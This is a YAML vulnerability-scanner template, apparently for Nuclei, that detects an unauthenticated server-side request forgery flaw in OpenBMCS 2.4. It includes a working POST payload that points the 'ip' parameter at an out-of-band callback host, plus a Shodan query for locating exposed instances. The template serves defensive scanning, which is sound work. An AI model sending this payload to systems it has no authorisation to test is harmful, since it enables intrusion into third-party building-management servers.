40 lines
1.4 KiB
YAML
40 lines
1.4 KiB
YAML
id: openbmcs-ssrf
|
|
|
|
info:
|
|
name: OpenBMCS 2.4 - Server-Side Request Forgery / Remote File Inclusion
|
|
author: dhiyaneshDK
|
|
severity: high
|
|
description: OpenBMCS 2.4 is susceptible to unauthenticated server-side request forgery and remote file inclusion vulnerabilities within its functionalities. The application parses user supplied data in the POST parameter 'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/50670
|
|
- https://securityforeveryone.com/tools/openbmcs-unauth-ssrf-rfi-vulnerability-scanner
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N
|
|
cvss-score: 6.8
|
|
cwe-id: CWE-918
|
|
metadata:
|
|
shodan-query: http.favicon.hash:1550906681
|
|
tags: ssrf,oast,openbmcs,edb
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /php/query.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
ip={{interactsh-url}}:80&argu=/
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the DNS Interaction
|
|
words:
|
|
- "http"
|
|
|
|
- type: status
|
|
status:
|
|
- 302
|
|
|
|
# Enhanced by mp on 2022/09/15
|